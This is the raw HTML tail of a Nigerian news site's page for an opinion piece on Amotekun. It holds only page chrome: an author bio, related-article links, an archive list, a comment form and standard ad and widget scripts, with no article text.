            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="https://www.facebook.com/plugins/like.php?href=https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/" data-text="The Real Amotekun Is Yet Ahead, By Bunmi Makinwa" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>            <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="https://naija247news.com/2020/01/25/for-our-departed-revolutionary-idealists-by-edwin-madunagu/">For Our Departed Revolutionary Idealists, By Edwin Madunagu</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Next article</span><a href="https://naija247news.com/2020/01/25/buhari-and-electoral-reform-the-unspoken-truth-by-skc-ogbonnia/">Buhari and Electoral Reform: The Unspoken Truth, By SKC Ogbonnia</a></div></div></div>            <div class="author-box-wrap"><a href="https://naija247news.com/author/247news/"></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="https://naija247news.com/author/247news/">Naija247news Media</a></span></div><div class="td-author-description">Godwin Okafor is a Financial Journalist, Internet Social Entrepreneur and Founder of Naija247news Media Limited. He has over 16 years experience in financial journalism. His experience cuts across traditional and digital media. He started his journalism career at Business Day, Nigeria and founded Naija247news Media in 2010.

Godwin holds a Bachelors degree in Industrial Relations and Personnel Management from the Lagos State University, Ojo, Lagos. He is an alumni of Lagos Business School and a Fellow of the University of Pennsylvania (Wharton Seminar for Business Journalists). Over the years, he has won a number of journalism awards. Godwin is the chairman of Emmerich Resources Limited, the publisher of Naija247news.</div><div class="td-author-social"></div><div class="clearfix"></div></div></div>	        <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Naija247news Media"></span><meta itemprop="datePublished" content="2020-01-25T18:29:20+00:00"><meta itemprop="dateModified" content="2020-01-25T18:29:20+01:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://naija247news.com/wp-content/uploads/2018/12/Naija247newslogo.jpg"></span><meta itemprop="name" content="Naija247news"></span><meta itemprop="headline " content="The Real Amotekun Is Yet Ahead, By Bunmi Makinwa"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/Bunmi.jpg?fit=225%2C225&ssl=1"><meta itemprop="width" content="225"><meta itemprop="height" content="225"></span>        </footer>

    </article> <!-- /.post -->

    <div class="td_block_wrap td_block_related_posts td_uid_69_5e2cc0f9107be_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_69_5e2cc0f9107be" ><script>var block_td_uid_69_5e2cc0f9107be = new tdBlock();
block_td_uid_69_5e2cc0f9107be.id = "td_uid_69_5e2cc0f9107be";
block_td_uid_69_5e2cc0f9107be.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_69_5e2cc0f9107be_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_69_5e2cc0f9107be_rand","live_filter":"cur_post_same_categories","live_filter_cur_post_id":311820,"live_filter_cur_post_author":"1"}';
block_td_uid_69_5e2cc0f9107be.td_column_number = "3";
block_td_uid_69_5e2cc0f9107be.block_type = "td_block_related_posts";
block_td_uid_69_5e2cc0f9107be.post_count = "3";
block_td_uid_69_5e2cc0f9107be.found_posts = "124";
block_td_uid_69_5e2cc0f9107be.header_color = "";
block_td_uid_69_5e2cc0f9107be.ajax_pagination_infinite_stop = "";
block_td_uid_69_5e2cc0f9107be.max_num_pages = "42";
tdBlocksArray.push(block_td_uid_69_5e2cc0f9107be);
</script><h4 class="td-related-title"><a id="td_uid_70_5e2cc0f914f39" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_69_5e2cc0f9107be" href="#">RELATED ARTICLES</a><a id="td_uid_71_5e2cc0f914f3f" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_69_5e2cc0f9107be" href="#">MORE FROM AUTHOR</a></h4><div id=td_uid_69_5e2cc0f9107be class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/19/the-migration-driven-by-developed-countries/" rel="bookmark" title="The Migration Driven by Developed Countries"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/143BA4C3-AF32-46B3-A3E3-09F17EA57361.jpeg?resize=218%2C150&ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/143BA4C3-AF32-46B3-A3E3-09F17EA57361.jpeg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2020/01/143BA4C3-AF32-46B3-A3E3-09F17EA57361.jpeg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="The Migration Driven by Developed Countries"/></a></div>                <a href="https://naija247news.com/category/thebackpage/africanism/" class="td-post-category">Africanism</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/19/the-migration-driven-by-developed-countries/" rel="bookmark" title="The Migration Driven by Developed Countries">The Migration Driven by Developed Countries</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/18/the-nigerian-middle-class-and-the-second-exodus-iii/" rel="bookmark" title="The Nigerian middle class and the second exodus (III)"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/07/LagosNigeria.jpeg?resize=218%2C150&ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/07/LagosNigeria.jpeg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2019/07/LagosNigeria.jpeg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="The Nigerian middle class and the second exodus (III)"/></a></div>                <a href="https://naija247news.com/category/thebackpage/africanism/" class="td-post-category">Africanism</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/18/the-nigerian-middle-class-and-the-second-exodus-iii/" rel="bookmark" title="The Nigerian middle class and the second exodus (III)">The Nigerian middle class and the second exodus (III)</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/18/the-nigerian-middle-class-and-the-second-exodus-ii/" rel="bookmark" title="The Nigerian middle class and the second exodus (II)"><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/Lagosokada-21.jpg?resize=218%2C150&ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/Lagosokada-21.jpg?resize=218%2C150&#038;ssl=1 218w, https://i0.wp.com/naija247news.com/wp-content/uploads/2019/11/Lagosokada-21.jpg?resize=436%2C300&#038;ssl=1 436w" sizes="(-webkit-min-device-pixel-ratio: 2) 436px, (min-resolution: 192dpi) 436px, 218px" alt="" title="The Nigerian middle class and the second exodus (II)"/></a></div>                <a href="https://naija247news.com/category/thebackpage/africanism/" class="td-post-category">Africanism</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/18/the-nigerian-middle-class-and-the-second-exodus-ii/" rel="bookmark" title="The Nigerian middle class and the second exodus (II)">The Nigerian middle class and the second exodus (II)</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_69_5e2cc0f9107be" data-td_block_id="td_uid_69_5e2cc0f9107be"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_69_5e2cc0f9107be" data-td_block_id="td_uid_69_5e2cc0f9107be"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
	<div class="comments" id="comments">
        
		<div id="respond" class="comment-respond">
							<h3 id="reply-title" class="comment-reply-title">Leave a Reply					<small><a rel="nofollow" id="cancel-comment-reply-link" href="/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/#respond" style="display:none;">Cancel reply</a></small>
				</h3>
						<form id="commentform" class="comment-form">
				<iframe title="Comment Form" src="https://jetpack.wordpress.com/jetpack-comment/?blogid=122485731&#038;postid=311820&#038;comment_registration=0&#038;require_name_email=1&#038;stc_enabled=1&#038;stb_enabled=1&#038;show_avatars=0&#038;avatar_default=mystery&#038;greeting=Leave+a+Reply&#038;greeting_reply=Leave+a+Reply+to+%25s&#038;color_scheme=light&#038;lang=en_ZA&#038;jetpack_version=8.1.1&#038;show_cookie_consent=10&#038;has_cookie_consent=0&#038;token_key=%3Bnormal%3B&#038;sig=171fd285c69759e84758036c62774eb9ed444a6e#parent=https%3A%2F%2Fnaija247news.com%2F2020%2F01%2F25%2Fthe-real-amotekun-is-yet-ahead-by-bunmi-makinwa%2F" style="width:100%; height: 430px; border:0;" name="jetpack_remote_comment" class="jetpack_remote_comment" id="jetpack_remote_comment" sandbox="allow-same-origin allow-top-navigation allow-scripts allow-forms allow-popups"></iframe>
									<!--[if !IE]><!-->
					<script>
						document.addEventListener('DOMContentLoaded', function () {
							var commentForms = document.getElementsByClassName('jetpack_remote_comment');
							for (var i = 0; i < commentForms.length; i++) {
								commentForms[i].allowTransparency = false;
								commentForms[i].scrolling = 'no';
							}
						});
					</script>
					<!--<![endif]-->
							</form>
		</div>

		
		<input type="hidden" name="comment_parent" id="comment_parent" value="" />

		<p class="akismet_comment_form_privacy_notice">This site uses Akismet to reduce spam. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Learn how your comment data is processed</a>.</p>    </div> <!-- /.content -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <aside class="widget widget_search"><form method="get" class="td-search-form-widget" action="https://naija247news.com/">
    <div role="search">
        <input class="td-widget-search-input" type="text" value="" name="s" id="s" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="searchsubmit" value="Search" />
    </div>
</form></aside><aside class="widget widget_google_translate_widget"><div id="google_translate_element"></div></aside>		<aside class="widget widget_recent_entries">		<div class="block-title"><span>Recent Posts</span></div>		<ul>
											<li>
					<a href="https://naija247news.com/2020/01/25/nigerias-soccer-striker-kelechi-iheanachos-goal-sends-foxes-into-fa-cup-last-16/">Nigeria&#8217;s soccer striker Kelechi Iheanacho&#8217;s goal sends Foxes into FA Cup last 16</a>
									</li>
											<li>
					<a href="https://naija247news.com/2020/01/25/the-significance-of-nigerian-words-coinages-in-2020-oxford-dictionary-by-olabisi-deji-folutile/">The Significance of Nigerian Words, Coinages In 2020 Oxford Dictionary, By Olabisi Deji-Folutile</a>
									</li>
											<li>
					<a href="https://naija247news.com/2020/01/25/buhari-and-electoral-reform-the-unspoken-truth-by-skc-ogbonnia/">Buhari and Electoral Reform: The Unspoken Truth, By SKC Ogbonnia</a>
									</li>
											<li>
					<a href="https://naija247news.com/2020/01/25/the-real-amotekun-is-yet-ahead-by-bunmi-makinwa/" aria-current="page">The Real Amotekun Is Yet Ahead, By Bunmi Makinwa</a>
									</li>
											<li>
					<a href="https://naija247news.com/2020/01/25/for-our-departed-revolutionary-idealists-by-edwin-madunagu/">For Our Departed Revolutionary Idealists, By Edwin Madunagu</a>
									</li>
											<li>
					<a href="https://naija247news.com/2020/01/25/clowning-in-davos-being-good-boys-in-u-k-by-owei-lakemfa/">Clowning In Davos, Being Good Boys In U.K., By Owei Lakemfa</a>
									</li>
											<li>
					<a href="https://naija247news.com/2020/01/25/lagos-governor-promises-car-gift-to-best-primary-school-teachers/">Lagos governor promises car gift to best primary school teachers</a>
									</li>
											<li>
					<a href="https://naija247news.com/2020/01/25/kano-politics-why-i-parted-ways-with-kwankwaso-decamped-to-apc-binta-spikin/">Kano Politics: Why I parted ways with Kwankwaso, decamped to APC &#8211; Binta Spikin</a>
									</li>
											<li>
					<a href="https://naija247news.com/2020/01/25/sanwo-olu-visits-lagos-explosion-victims/">Sanwo-Olu visits Lagos explosion victims</a>
									</li>
											<li>
					<a href="https://naija247news.com/2020/01/25/notorious-thugs-attack-journalists-covering-akwa-ibom-elections/">Notorious thugs attack journalists covering Akwa Ibom elections</a>
									</li>
					</ul>
		</aside><aside class="widget widget_archive"><div class="block-title"><span>Archives</span></div>		<label class="screen-reader-text" for="archives-dropdown-2">Archives</label>
		<select id="archives-dropdown-2" name="archive-dropdown">
			
			<option value="">Select Month</option>
				<option value='https://naija247news.com/2020/01/'> Jan 2020 </option>
	<option value='https://naija247news.com/2019/12/'> Dec 2019 </option>
	<option value='https://naija247news.com/2019/11/'> Nov 2019 </option>
	<option value='https://naija247news.com/2019/10/'> Oct 2019 </option>
	<option value='https://naija247news.com/2019/09/'> Sep 2019 </option>
	<option value='https://naija247news.com/2019/08/'> Aug 2019 </option>
	<option value='https://naija247news.com/2019/07/'> Jul 2019 </option>
	<option value='https://naija247news.com/2019/06/'> Jun 2019 </option>
	<option value='https://naija247news.com/2019/05/'> May 2019 </option>
	<option value='https://naija247news.com/2019/04/'> Apr 2019 </option>
	<option value='https://naija247news.com/2019/03/'> Mar 2019 </option>
	<option value='https://naija247news.com/2019/02/'> Feb 2019 </option>
	<option value='https://naija247news.com/2019/01/'> Jan 2019 </option>
	<option value='https://naija247news.com/2018/12/'> Dec 2018 </option>
	<option value='https://naija247news.com/2018/11/'> Nov 2018 </option>
	<option value='https://naija247news.com/2018/10/'> Oct 2018 </option>
	<option value='https://naija247news.com/2018/09/'> Sep 2018 </option>
	<option value='https://naija247news.com/2018/08/'> Aug 2018 </option>
	<option value='https://naija247news.com/2018/07/'> Jul 2018 </option>
	<option value='https://naija247news.com/2018/06/'> Jun 2018 </option>
	<option value='https://naija247news.com/2018/05/'> May 2018 </option>
	<option value='https://naija247news.com/2018/04/'> Apr 2018 </option>
	<option value='https://naija247news.com/2018/03/'> Mar 2018 </option>
	<option value='https://naija247news.com/2018/02/'> Feb 2018 </option>
	<option value='https://naija247news.com/2018/01/'> Jan 2018 </option>
	<option value='https://naija247news.com/2017/12/'> Dec 2017 </option>
	<option value='https://naija247news.com/2017/11/'> Nov 2017 </option>
	<option value='https://naija247news.com/2017/10/'> Oct 2017 </option>
	<option value='https://naija247news.com/2017/09/'> Sep 2017 </option>
	<option value='https://naija247news.com/2017/08/'> Aug 2017 </option>
	<option value='https://naija247news.com/2017/07/'> Jul 2017 </option>
	<option value='https://naija247news.com/2017/06/'> Jun 2017 </option>
	<option value='https://naija247news.com/2017/05/'> May 2017 </option>
	<option value='https://naija247news.com/2017/04/'> Apr 2017 </option>
	<option value='https://naija247news.com/2017/03/'> Mar 2017 </option>
	<option value='https://naija247news.com/2017/02/'> Feb 2017 </option>
	<option value='https://naija247news.com/2017/01/'> Jan 2017 </option>
	<option value='https://naija247news.com/2016/12/'> Dec 2016 </option>
	<option value='https://naija247news.com/2016/11/'> Nov 2016 </option>
	<option value='https://naija247news.com/2016/10/'> Oct 2016 </option>
	<option value='https://naija247news.com/2016/09/'> Sep 2016 </option>
	<option value='https://naija247news.com/2016/08/'> Aug 2016 </option>
	<option value='https://naija247news.com/2016/07/'> Jul 2016 </option>
	<option value='https://naija247news.com/2016/06/'> Jun 2016 </option>
	<option value='https://naija247news.com/2016/05/'> May 2016 </option>
	<option value='https://naija247news.com/2016/04/'> Apr 2016 </option>
	<option value='https://naija247news.com/2016/03/'> Mar 2016 </option>
	<option value='https://naija247news.com/2016/02/'> Feb 2016 </option>
	<option value='https://naija247news.com/2016/01/'> Jan 2016 </option>
	<option value='https://naija247news.com/2015/12/'> Dec 2015 </option>
	<option value='https://naija247news.com/2015/11/'> Nov 2015 </option>
	<option value='https://naija247news.com/2015/10/'> Oct 2015 </option>
	<option value='https://naija247news.com/2015/09/'> Sep 2015 </option>
	<option value='https://naija247news.com/2015/08/'> Aug 2015 </option>
	<option value='https://naija247news.com/2015/07/'> Jul 2015 </option>
	<option value='https://naija247news.com/2015/06/'> Jun 2015 </option>
	<option value='https://naija247news.com/2015/05/'> May 2015 </option>
	<option value='https://naija247news.com/2015/04/'> Apr 2015 </option>
	<option value='https://naija247news.com/2015/03/'> Mar 2015 </option>
	<option value='https://naija247news.com/2015/02/'> Feb 2015 </option>
	<option value='https://naija247news.com/2015/01/'> Jan 2015 </option>
	<option value='https://naija247news.com/2014/12/'> Dec 2014 </option>
	<option value='https://naija247news.com/2014/11/'> Nov 2014 </option>
	<option value='https://naija247news.com/2014/10/'> Oct 2014 </option>
	<option value='https://naija247news.com/2014/09/'> Sep 2014 </option>
	<option value='https://naija247news.com/2014/08/'> Aug 2014 </option>
	<option value='https://naija247news.com/2014/07/'> Jul 2014 </option>
	<option value='https://naija247news.com/2014/06/'> Jun 2014 </option>
	<option value='https://naija247news.com/2014/05/'> May 2014 </option>
	<option value='https://naija247news.com/2014/04/'> Apr 2014 </option>
	<option value='https://naija247news.com/2014/03/'> Mar 2014 </option>
	<option value='https://naija247news.com/2014/02/'> Feb 2014 </option>
	<option value='https://naija247news.com/2014/01/'> Jan 2014 </option>
	<option value='https://naija247news.com/2013/12/'> Dec 2013 </option>
	<option value='https://naija247news.com/2013/11/'> Nov 2013 </option>
	<option value='https://naija247news.com/2013/10/'> Oct 2013 </option>
	<option value='https://naija247news.com/2013/09/'> Sep 2013 </option>
	<option value='https://naija247news.com/2013/08/'> Aug 2013 </option>
	<option value='https://naija247news.com/2013/07/'> Jul 2013 </option>
	<option value='https://naija247news.com/2013/06/'> Jun 2013 </option>
	<option value='https://naija247news.com/2013/04/'> Apr 2013 </option>
	<option value='https://naija247news.com/2013/03/'> Mar 2013 </option>
	<option value='https://naija247news.com/2012/12/'> Dec 2012 </option>
	<option value='https://naija247news.com/2012/10/'> Oct 2012 </option>
	<option value='https://naija247news.com/2012/09/'> Sep 2012 </option>
	<option value='https://naija247news.com/2012/07/'> Jul 2012 </option>
	<option value='https://naija247news.com/2012/04/'> Apr 2012 </option>
	<option value='https://naija247news.com/2012/03/'> Mar 2012 </option>
	<option value='https://naija247news.com/2012/02/'> Feb 2012 </option>
	<option value='https://naija247news.com/2011/12/'> Dec 2011 </option>

		</select>

<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "archives-dropdown-2" );
	function onSelectChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {
			document.location.href = this.options[ this.selectedIndex ].value;
		}
	}
	dropdown.onchange = onSelectChange;
})();
/* ]]> */
</script>

		</aside><aside class="widget_text widget widget_custom_html"><div class="block-title"><span>Code</span></div><div class="textwidget custom-html-widget"><script data-ad-client="ca-pub-6874945212263678" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script></div></aside>                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->


<!-- Instagram -->



<!-- Footer -->
<div class="td-footer-wrapper">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-footer_top ">
<script type="text/javascript">
var td_screen_width = window.innerWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="3977655689"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="3977655689"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="3977655689"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-6874945212263678" data-ad-slot="3977655689"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_7 td_uid_73_5e2cc0f94bbbf_rand td-pb-border-top"  data-td-block-uid="td_uid_73_5e2cc0f94bbbf" ><script>var block_td_uid_73_5e2cc0f94bbbf = new tdBlock();
block_td_uid_73_5e2cc0f94bbbf.id = "td_uid_73_5e2cc0f94bbbf";
block_td_uid_73_5e2cc0f94bbbf.atts = '{"limit":3,"sort":"featured","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"EDITOR PICKS","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_73_5e2cc0f94bbbf_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_73_5e2cc0f94bbbf_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_73_5e2cc0f94bbbf.td_column_number = "1";
block_td_uid_73_5e2cc0f94bbbf.block_type = "td_block_7";
block_td_uid_73_5e2cc0f94bbbf.post_count = "3";
block_td_uid_73_5e2cc0f94bbbf.found_posts = "1305";
block_td_uid_73_5e2cc0f94bbbf.header_color = "";
block_td_uid_73_5e2cc0f94bbbf.ajax_pagination_infinite_stop = "";
block_td_uid_73_5e2cc0f94bbbf.max_num_pages = "435";
tdBlocksArray.push(block_td_uid_73_5e2cc0f94bbbf);
</script><div class="td-block-title-wrap"><h4 class="block-title"><span>EDITOR PICKS</span></h4></div><div id=td_uid_73_5e2cc0f94bbbf class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/nigeria-seeks-1-1bn-brazilian-loan-to-deepen-local-farmers-access-to-agricultural-value-chain/" rel="bookmark" title="Nigeria seeks $1.1Bn Brazilian loan to deepen local farmers’ access to agricultural value chain"><img width="100" height="70" class="entry-thumb" src="https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/valueChain.jpg?resize=100%2C70&ssl=1" srcset="https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/valueChain.jpg?resize=100%2C70&#038;ssl=1 100w, https://i2.wp.com/naija247news.com/wp-content/uploads/2020/01/valueChain.jpg?resize=200%2C140&#038;ssl=1 200w" sizes="(-webkit-min-device-pixel-ratio: 2) 200px, (min-resolution: 192dpi) 200px, 100px" alt="" title="Nigeria seeks $1.1Bn Brazilian loan to deepen local farmers’ access to agricultural value chain"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/nigeria-seeks-1-1bn-brazilian-loan-to-deepen-local-farmers-access-to-agricultural-value-chain/" rel="bookmark" title="Nigeria seeks $1.1Bn Brazilian loan to deepen local farmers’ access to agricultural value chain">Nigeria seeks $1.1Bn Brazilian loan to deepen local farmers’ access to...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2020-01-24T19:14:32+00:00" >Jan 24, 2020</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/cbn-raises-banks-cash-reserve-ratio-for-first-time-in-four-years/" rel="bookmark" title="CBN raises bank&#8217;s cash reserve  ratio for first time in four years"><img width="100" height="70" class="entry-thumb" src="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/10/CBN.jpg?resize=100%2C70&ssl=1" srcset="https://i0.wp.com/naija247news.com/wp-content/uploads/2019/10/CBN.jpg?resize=100%2C70&#038;ssl=1 100w, https://i0.wp.com/naija247news.com/wp-content/uploads/2019/10/CBN.jpg?resize=200%2C140&#038;ssl=1 200w" sizes="(-webkit-min-device-pixel-ratio: 2) 200px, (min-resolution: 192dpi) 200px, 100px" alt="" title="CBN raises bank&#8217;s cash reserve  ratio for first time in four years"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/cbn-raises-banks-cash-reserve-ratio-for-first-time-in-four-years/" rel="bookmark" title="CBN raises bank&#8217;s cash reserve  ratio for first time in four years">CBN raises bank&#8217;s cash reserve  ratio for first time in...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2020-01-24T17:21:37+00:00" >Jan 24, 2020</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://naija247news.com/2020/01/24/what-you-need-to-know-about-chinas-wuhan-coronavirus/" rel="bookmark" title="What You Need to Know About China&#8217;s Wuhan Coronavirus"><img width="100" height="70" class="entry-thumb" src="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/merlin_167560230_dfe2fbdd-ec11-4318-a1d7-cb5fc345ee80-superJumbo.jpg?resize=100%2C70&ssl=1" srcset="https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/merlin_167560230_dfe2fbdd-ec11-4318-a1d7-cb5fc345ee80-superJumbo.jpg?resize=100%2C70&#038;ssl=1 100w, https://i1.wp.com/naija247news.com/wp-content/uploads/2020/01/merlin_167560230_dfe2fbdd-ec11-4318-a1d7-cb5fc345ee80-superJumbo.jpg?resize=200%2C140&#038;ssl=1 200w" sizes="(-webkit-min-device-pixel-ratio: 2) 200px, (min-resolution: 192dpi) 200px, 100px" alt="" title="What You Need to Know About China&#8217;s Wuhan Coronavirus"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://naija247news.com/2020/01/24/what-you-need-to-know-about-chinas-wuhan-coronavirus/" rel="bookmark" title="What You Need to Know About China&#8217;s Wuhan Coronavirus">What You Need to Know About China&#8217;s Wuhan Coronavirus</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2020-01-24T05:24:37+00:00" >Jan 24, 2020</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->                            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_7 td_uid_74_5e2cc0f950aae_rand td-pb-border-top"  data-td-block-uid="td_uid_74_5e2cc0f950aae" ><script>var block_td_uid_74_5e2cc0f950aae = new tdBlock();
block_td_uid_74_5e2cc0f950aae.id = "td_uid_74_5e2cc0f950aae";
